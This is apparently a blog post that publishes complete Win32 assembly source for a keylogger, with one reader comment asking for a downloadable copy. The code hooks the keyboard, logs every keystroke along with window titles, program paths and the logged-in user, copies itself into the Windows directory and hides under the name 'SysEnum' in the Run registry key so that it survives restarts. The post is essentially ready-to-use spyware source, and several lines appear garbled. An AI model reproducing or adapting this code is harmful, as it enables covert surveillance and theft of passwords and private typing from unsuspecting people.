Simple keylogger in Win32Asm

  
.386
.model flat, stdcall
option casemap:none

include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include msvcrt.inc

includelib user32.lib 
includelib kernel32.lib 
includelib advapi32.lib 
includelib msvcrt.lib 

KeyBoardProc proto :DWORD, :WPARAM, :LPARAM 

pushz	macro szText:VARARG
	local	nexti 
	call	nexti 
	db	szText,00h
nexti: 
endm

.data

hBuffer			dd		? 
hComputerName 		db 		32  dup(0)
hCurrentThreadPiD 	dd 		0
hCurrentWindow		dd0
hDateFormat		db"dd MMM yyyy", 0
hDomaineName  		db 		128 dup(0)
hFile			dd0
hHook			dd0
hmodul  		MODULEENTRY32  	<> 
hSnapShot 		dd 		0
hTimeFormat		db"hh:mm:ss tt", 0
hUserName               db 		32  dup(0)
msg			MSG		<> 
onlyOneCopy		db"Globalzkl",0
 szRun db "SOFTWAREMicrosoftWindowsCurrentVersionRun",0
 szReg db "SysEnum",0
 buffer db 50 dup(?)

.data? 
  hReg dd ? 
  szPath db 256 dup(?)

.code
main: 

	invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg 
	invoke GetModuleFileName, 0, addr szPath, sizeof szPath 
	invoke RegSetValueEx, hReg, ADDR szReg, 0, 1, addr szPath, eax
	invoke RegCloseKey, hReg 

	invoke GetWindowsDirectory, addr buffer, sizeof buffer 
	invoke CopyFile,addr szPath,addr buffer,FALSE 

	invoke	 CreateMutexA,0,0,addr onlyOneCopy 
	invoke	 GetLastError 
	cmp	 eax,ERROR_ALREADY_EXISTS 
	je	 more_than_one_copy 

	xor	ebx, ebx

 	pushz	"ab"
 	pushz	"log.txt"
 	call	fopen 
  	add	esp, 2*4
 	mov	[hFile], eax

	invoke  GetModuleHandleA, NULL 

	invoke 	SetWindowsHookExA, WH_KEYBOARD_LL, ADDR KeyBoardProc, eax, ebx
	mov	[hHook], eax

	invoke	GetMessageA, ADDR msg, NULL, NULL, NULL 

	invoke	UnhookWindowsHookEx, hHook 

	invoke	fclose, hFile 

more_than_one_copy: 

	invoke	ExitProcess, 0h 

KeyBoardProc	PROC	nCode:DWORD, wParam:DWORD, lParam:DWORD
	LOCAL	lpKeyState[256]	:BYTE
         LOCAL   lpClassName[64]	:BYTE
	LOCAL	lpCharBuf[32]	:BYTE
       	LOCAL   lpDateBuf[12]	:BYTE
         LOCAL   lpTimeBuf[12]	:BYTE
         LOCAL   lpLocalTime	:SYSTEMTIME 
	;----------------------------

	lea	edi, [lpKeyState]
	push	256/4
	pop	ecx
	xor	eax, eax
	rep	stosd

	mov	eax, wParam 
	cmp	eax, WM_KEYUP 
	je	next_hook 

	cmp	eax, WM_SYSKEYUP 
	je	next_hook 

	invoke	GetForegroundWindow 
	cmp	[hCurrentWindow], eax
	je	no_window_change 

	mov	[hCurrentWindow], eax

	invoke	GetClassName, hCurrentWindow, ADDR lpClassName, 64

	invoke 	GetLocalTime, ADDR lpLocalTime 

	invoke	GetDateFormat, NULL, NULL, ADDR lpLocalTime, ADDR hDateFormat, ADDR lpDateBuf, 12

	invoke	GetTimeFormat, NULL, NULL, ADDR lpLocalTime, ADDR hTimeFormat, ADDR lpTimeBuf, 12

	invoke	GetWindowThreadProcessId, hCurrentWindow, ADDR hCurrentThreadPiD 

	invoke 	CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, hCurrentThreadPiD 
	mov 	hSnapShot,eax

        mov 	hmodul.dwSize, sizeof MODULEENTRY32 

	invoke 	Module32First,hSnapShot,addr hmodul 

	invoke 	CloseHandle,hSnapShot 

	invoke	GetWindowText, hCurrentWindow, ADDR lpKeyState, 256

        lea     esi, [hmodul.szExePath]
        push	esi
        lea 	esi, [lpTimeBuf]
        push	esi
        lea	esi, [lpDateBuf]
        push    esi
	pushz	13,10,"[%s, %s - Program:%s]",13,10
	push	[hFile]
	call	fprintf 
	add	esp, 3*4

	lea	esi, [lpClassName]
	push	esi
	lea	esi, [lpKeyState]
	push	esi
	pushz	13,10,"[       Windows Name:%s       ]",13,10
	push	[hFile]
	call	fprintf 
	add	esp, 3*4

	mov 	hBuffer, 128
	invoke	GetComputerNameExA, 1, ADDR hDomaineName, ADDR hBuffer 

	mov	hBuffer, 32
	invoke	GetComputerNameExA, 0, ADDR hComputerName, ADDR hBuffer 

	mov	hBuffer, 32
	invoke	GetUserName, ADDR hUserName, ADDR hBuffer 

        lea 	esi, [hUserName]
        push 	esi
        pushz 	"[       Logged user: %s]",13,10
        push	[hFile]
	call	fprintf 
	add	esp, 3*4

	invoke	fflush, hFile 

no_window_change: 
	mov	esi, [lParam]
	lodsd
	cmp	al, VK_LSHIFT 
	je	next_hook 
	cmp	al, VK_RSHIFT 
	je	next_hook 
	cmp	al, VK_CAPITAL 
	je	next_hook 
	cmp	al, VK_ESCAPE 
	je	get_name_of_key 
	cmp	al, VK_BACK 
	je	get_name_of_key 
	cmp	al, VK_TAB 
	je	get_name_of_key 
	;------------------
	lea	edi, [lpCharBuf]
	push	32/4
	pop	ecx
	xor	eax, eax
	rep	stosd
	;----------

	lea	ebx, [lpKeyState]
	push	ebx
	call	GetKeyboardState 

	invoke	GetKeyState, VK_LSHIFT 
	xchg	esi, eax

	invoke	GetKeyState, VK_RSHIFT 
	or	eax, esi

	mov	byte ptr [ebx + 16], al

	invoke	GetKeyState, VK_CAPITAL 
	mov	byte ptr [ebx + 20], al

	mov	esi, [lParam]
	lea	edi, [lpCharBuf]
	push	00h
	push	edi
	push	ebx
	lodsd
	xchg	eax, edx
	lodsd
	push	eax
	push	edx
	call	ToAscii 
	test	eax, eax
	jnz	test_carriage_return 

get_name_of_key: 
	mov	esi, [lParam]
	lodsd
	lodsd
	shl	eax, 16
	xchg	eax, ecx
	lodsd
	shl	eax, 24
	or	ecx, eax

	push	32
	lea	edi, [lpCharBuf]
	push	edi
	push	ecx
	call	GetKeyNameTextA 

	push	edi
	pushz	"[%s]"
	jmp	write_to_file 

test_carriage_return: 
	push	edi
	pushz	"%s"

	cmp	byte ptr [edi], 0dh
	jne	write_to_file 

	mov	byte ptr [edi + 1], 0ah
write_to_file: 
	invoke	fprintf, hFile 

next_hook: 
	invoke	CallNextHookEx, hHook, nCode, wParam, lParam 
	ret

KeyBoardProc	ENDP

end	main 

; See: http://mo4x.com/
Advertisements

2 Responses to Simple keylogger in Win32Asm

  1. asm says:

    hey can you upload this somewhere as a .asm file so I can test it? I can’t copy and paste it because it copies a bunch of wierd html symbols get stuck in it. Awsome job though

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: